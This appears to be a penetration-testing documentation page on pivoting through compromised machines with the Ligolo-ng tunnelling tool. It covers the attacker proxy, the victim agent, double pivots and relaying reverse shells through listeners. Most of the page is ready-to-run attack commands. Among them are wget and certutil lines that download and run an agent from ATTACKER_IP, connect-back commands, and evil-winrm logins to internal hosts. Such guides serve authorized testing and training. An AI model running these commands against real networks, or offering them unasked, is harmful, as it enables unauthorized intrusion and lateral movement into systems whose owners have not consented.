> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Ligolo-ng

> Pivoting with Ligolo-ng: tunnel setup, double pivot, port forwarding, and listener through pivot.

## Overview

Ligolo-ng creates encrypted tunnels using a TUN interface. No SOCKS proxy needed — traffic routes natively through the kernel. Faster and more stable than chisel/proxychains.

| Component | Runs on  | Description                |
| --------- | -------- | -------------------------- |
| **Proxy** | Attacker | Manages tunnels and routes |
| **Agent** | Victim   | Connects back to proxy     |

***

## Download

### GitHub

```bash theme={"dark"}
# Latest release
https://github.com/nicocha30/ligolo-ng/releases
```

Download both `proxy` (attacker) and `agent` (victim). Match OS and architecture.

### Build from source

```bash theme={"dark"}
go install github.com/nicocha30/ligolo-ng/cmd/proxy@latest
go install github.com/nicocha30/ligolo-ng/cmd/agent@latest
```

***

## Setup — Attacker

### Create TUN interface

```bash theme={"dark"}
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
```

### Start proxy

```bash theme={"dark"}
./proxy -selfcert
```

Default listener: `0.0.0.0:11601`

Custom port:

```bash theme={"dark"}
./proxy -selfcert -laddr 0.0.0.0:443
```

***

## Setup — Victim

### Transfer agent

```bash theme={"dark"}
# From attacker
python3 -m http.server 80

# On victim (Linux)
wget http://ATTACKER_IP/agent -O /tmp/agent && chmod +x /tmp/agent

# On victim (Windows)
certutil -urlcache -f http://ATTACKER_IP/agent.exe agent.exe
```

### Connect back

Linux:

```bash theme={"dark"}
./agent -connect ATTACKER_IP:11601 -ignore-cert
```

Windows:

```cmd theme={"dark"}
agent.exe -connect ATTACKER_IP:11601 -ignore-cert
```

***

## Start Tunnel

In proxy console:

```
» session
```

Select the active session, then:

```
» start
```

### Add route to internal network

```bash theme={"dark"}
sudo ip route add 172.16.0.0/24 dev ligolo
```

Now access internal hosts directly:

```bash theme={"dark"}
nmap -sn 172.16.0.0/24
curl http://172.16.0.1
evil-winrm -i 172.16.0.5 -u admin -p password
```

***

## Double Pivot

Reach a third network through two compromised machines.

### Scenario

```
Attacker → Victim1 (10.10.10.0/24 + 172.16.0.0/24) → Victim2 (172.16.0.0/24 + 192.168.1.0/24)
```

### Step 1 — First pivot (already done)

```bash theme={"dark"}
sudo ip route add 172.16.0.0/24 dev ligolo
```

### Step 2 — Upload agent to Victim2

Use listener (see below) or transfer through Victim1.

### Step 3 — Add listener on Victim1

In proxy console, select Victim1 session:

```
» listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
```

### Step 4 — Connect Victim2 agent through Victim1

On Victim2:

```bash theme={"dark"}
./agent -connect 172.16.0.X:11601 -ignore-cert
```

### Step 5 — Route third network

```bash theme={"dark"}
sudo ip tuntap add user $(whoami) mode tun ligolo2
sudo ip link set ligolo2 up
sudo ip route add 192.168.1.0/24 dev ligolo2
```

Select Victim2 session in proxy, specify interface:

```
» start --tun ligolo2
```

***

## Port Forwarding (Listener)

Expose attacker port through victim. Useful for reverse shells and file transfer through pivot.

### Reverse shell through pivot

In proxy console:

```
» listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp
```

Victim2 sends reverse shell to Victim1 IP on port 4444 → arrives on attacker's port 4444.

### File server through pivot

```
» listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80 --tcp
```

Start web server on attacker port 80. Internal hosts download from `Victim1_IP:8080`.

### List active listeners

```
» listener_list
```

### Remove listener

```
» listener_stop <id>
```

***

## Useful Commands (Proxy Console)

| Command         | Description                      |
| --------------- | -------------------------------- |
| `session`       | List/select sessions             |
| `start`         | Start tunnel on selected session |
| `stop`          | Stop active tunnel               |
| `listener_add`  | Add port forward                 |
| `listener_list` | Show active listeners            |
| `listener_stop` | Remove listener                  |
| `ifconfig`      | Show victim network interfaces   |

***

## Troubleshooting

| Problem                      | Fix                                                                    |
| ---------------------------- | ---------------------------------------------------------------------- |
| No route to host             | Check `ip route` — add route for internal subnet to `ligolo` interface |
| Agent won't connect          | Firewall blocking outbound? Try port 443: `-laddr 0.0.0.0:443`         |
| Tunnel starts but no traffic | Wrong TUN interface — verify with `ip route` and `start --tun ligoloX` |
| DNS not resolving            | Add internal DNS to `/etc/resolv.conf` or use IPs directly             |
